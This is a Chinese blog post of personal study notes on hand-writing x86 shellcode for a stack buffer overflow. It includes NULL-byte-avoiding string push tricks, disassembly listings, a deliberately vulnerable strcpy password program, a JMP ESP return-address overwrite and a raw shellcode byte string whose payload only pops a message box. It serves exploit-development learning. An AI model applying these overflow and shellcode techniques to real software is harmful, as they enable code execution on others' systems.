栈溢出shellcode字符串push

最新推荐文章于 2023-03-06 16:56:00 发布
最新推荐文章于 2023-03-06 16:56:00 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/9668907
版权

这是很久以前的笔记了  去年的笔记···········

这里增加几条:

1)  PUSH  字符串, 先用其他字符代表0x00  然后 通过 EBP的负偏离量处一字节一字节的写入!!!!!!!!!!

重新产生没有 NULL字节的 机器码

2) XOR/add /sub  计算  比如 0x006e616c  那么     0x77191693 xor 0x777777ff = 0x006e616c    直接压入 进行xor

mov eax,0x77191693 

mov ebx,0x777777ff

xor eax,ebx

push eax 

3)直接压入字符串 然后单字节压入 

xor eax,eax, 

push eax,           

mov ebp,esp

mov byte [ebp-2] ,61

4) 对于  像  0x000000AB   的字符的话    用  

mov eax,0xXXXXX   

push eax

5)直接用  0x20 空格代替 结束符,一般情况下可以用的



00401110      33C0          xor eax,eax
00401112      8BEC          mov ebp,esp
00401114      68 61202020   push 0x20202061
00401119      8845 FD       mov byte ptr ss:[ebp-0x3],al
0040111C      68 70616E64   push 0x646E6170
00401121      8BDC          mov ebx,esp
00401123      50            push eax
00401124      68 B3F6C1CB   push 0xCBC1F6B3
00401129      68 BEADD2E7   push 0xE7D2ADBE
0040112E      68 6120D2D1   push 0xD1D22061
00401133      68 70616E64   push 0x646E6170
00401138      68 B1A8B8E6   push 0xE6B8A8B1
0040113D      8BCC          mov ecx,esp
0040113F      50            push eax
00401140      53            push ebx
00401141      51            push ecx
00401142      50            push eax
00401143      E8 A2F69477   call USER32.MessageBoxA

可以看到我们已经可以构造  不是标准 4字节的字符串了,而且可以再也不用烦恼 bad character!!!!!!!!!




以下分析有错   在JMP EBX  中  运行shellcode运行时会修改shellcode 所以最好都不知道变什么样了  但是PUSH 字符串分析是正确的

因为压栈会破坏数据


想要插入字符串  必须从后往前插入 如果大于4字节  并且保证最后为4字节再例如:

0013FAF0    33DB                               xor ebx,ebx
0013FAF2    53                                 push ebx
0013FAF3    6A 61                              push 0x61
0013FAF5    68 50616E64                        push 0x646E6150
0013FAFA    68 20627920                        push 0x20796220
0013FAFF    68 30646179                        push 0x79616430
0013FB04    8BC4                               mov eax,esp

原因是 push 后有结束符吧
以上是最难得地方;


这里是源码:

#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
int verify_password (char *password)
{
	int authenticated;
	char buffer[44];
	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);//over flowed here!	
	return authenticated;
}
main()
{
	int valid_flag=0;
	char password[1024];
	FILE * fp;
	LoadLibrary("user32.dll");//prepare for messagebox
	if(!(fp=fopen("password.txt","rw+")))
	{
		exit(0);
	}
	fscanf(fp,"%s",password);
	valid_flag = verify_password(password);
	if(valid_flag)
	{
		printf("incorrect password!\n");
	}
	else
	{
		printf("Congratulation! You have passed the verification!\n");
	}
	fclose(fp);
}

写了个程序  可以倒叙输出字符串  方便压栈





以下为正确的:

JMP ESP   堆栈很安全  几乎没被修改:

77D91E64  - FFE4            jmp esp
在返回地址处 修改为上面这个 

0013FB28    33DB            xor ebx,ebx
0013FB2A    53              push ebx
0013FB2B    6A 61           push 0x61
0013FB2D    68 50616E64     push 0x646E6150
0013FB32    8BC4            mov eax,esp
0013FB34    53              push ebx
0013FB35    50              push eax
0013FB36    50              push eax
0013FB37    53              push ebx
0013FB38    B8 EA07D577     mov eax,user32.MessageBoxA
0013FB3D    FFD0            call eax
0013FB3F    B8 FACA817C     mov eax,kernel32.ExitProcess
0013FB44    FFD0            call eax

二进制位:

33 DB 53 6A 61 68 50 61 6E 64 8B C4 53 50 50 53 B8 EA 07 D5 77 FF D0 B8 FA CA 81 7C FF D0

安全弹框  安全退出













pandamac
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【逆向】栈溢出漏洞学习过程(一)通过字符串验证的简单程序分析
lanlanla的成长历程
01-08 3266
目录 前言: 1 准备程序 PS:翻车现场: 2 分析程序执行流程(栈溢出原理) 2.1 看代码中忘记的知识补充一下: 2.1.1 主函数中涉及的寄存器相关知识: 2.1.2 涉及到的指令 地址传送指令LEA PTR REP STOS int 3中断 段超越指令前缀 2.2 main函数中的初始化部分 2.3 scanf()函数部分 2.4 函数verify_pas...
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5817
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
shellcode转换字符串
07-18
shellcode转换字符串
shellcode之一:栈溢出
AZURE
01-22 5089
前言:现在我是嵌入式软件开发者,大学本科读的是电子信息专业,正常的来说不会与入侵、漏洞利用什么的打交道。只是大一时心血来潮用工具进入了另外一台电脑。其实这些也无关重要,重要的是我从那台电脑上down了第一部A片。不出意外的话,那台电脑应该属于女生的,因为那个IP段是女生楼那边的。后来我就可以很笃定的跟别人说:女生也是要看A片的。后来又用工具入侵了更多的局域网电脑,甚至学校一些社团的服务器。再后来,
栈溢出攻击和shellcode
LittleEmperor
09-16 6057
README 本文默认读者熟悉C语言编程和x86汇编语法,熟悉函数调用过程和调用规约,简单了解linux系统,包括进程内存布局,系统调用和内核内存管理机制,对栈溢出攻击有基本认知。 文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。 文章将抛开宏观层面的解释,尽量细致地阐述shellcode的构建过程和异常问题分析等诸多细节,帮助读者把栈溢出攻击和s...
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 516
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
PWN基础知识及基础栈溢出手法
山高路远
04-12 4019
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
栈溢出攻击之弹出计算器
Bonjour~
04-15 7725
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1907
一个小白的慢慢理会过程
shellcode中在代码段中使用字符串
dasgk的专栏
09-12 1464
// CrackMe.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include #include using namespace std; int main() {     goto shellEnd;     _asm     { shellCode:         pushad;
漏洞练习之网络编程与堆栈溢出技术
蚁景网安学院
07-20 511
0x00公众号之前发过Exploit-Exercise之Nebula实践指南,Exploit-Exercise一共有5个镜像可供练习,如下所示本系列文章将会介绍第二个镜像Protosta...
C 栈溢出详解
热门推荐
lanximu的专栏
01-14 1万+
转载:作者:独自等待出处:IT专家网2007-12-18 09:56 虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术……   在您开始了解堆栈溢出前,首先你应该了解win32汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面的基础知识,有关这方面的计算机书籍
shellcode编写探究
hongduilanjun的博客
07-21 1081
shellcode是不依赖环境,放到任何地方都可以执行的机器码。shellcode的应用场景很多,本文不研究shellcode的具体应用,而只是研究编写一个shellcode需要掌握哪些知识。
栈溢出原理与实现
挖树
10-23 1001
栈结构: 1.方向:高地址(栈底)->低地址(栈顶) 2.加载完成pe后,系统会为这个pe分配一个栈,这个栈用于 实现(类似C)高级语言中函数的调用。 3.(2)所说的分配的栈是系统自动维护,并且push pop等平衡细节都是透明的。一般来说只有在使用汇编代码的时候,心会和它直接打交道。 函数调用与栈 #include<stdio.h> void fuc_B() { pr...
shellcode编写
摸爬滚打
04-20 1085
一般用5个步骤实现 先用高级语言编写shellcode程序 编译并反汇编这个shellcode程序 从汇编级分析程序执行流程 整理生成的汇编代码 尽量减小他的体积使他可注入 提取opcode,创建shellcode shellcode地址问题       在shellcode使用相对地址需要一些技巧。可以把shellcode在内存中的开始地址或 shellcode的重要元
Shellcode提取、加载与解析
最新发布
莫慌的博客
03-06 2015
msf的shellcode 如何实现的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值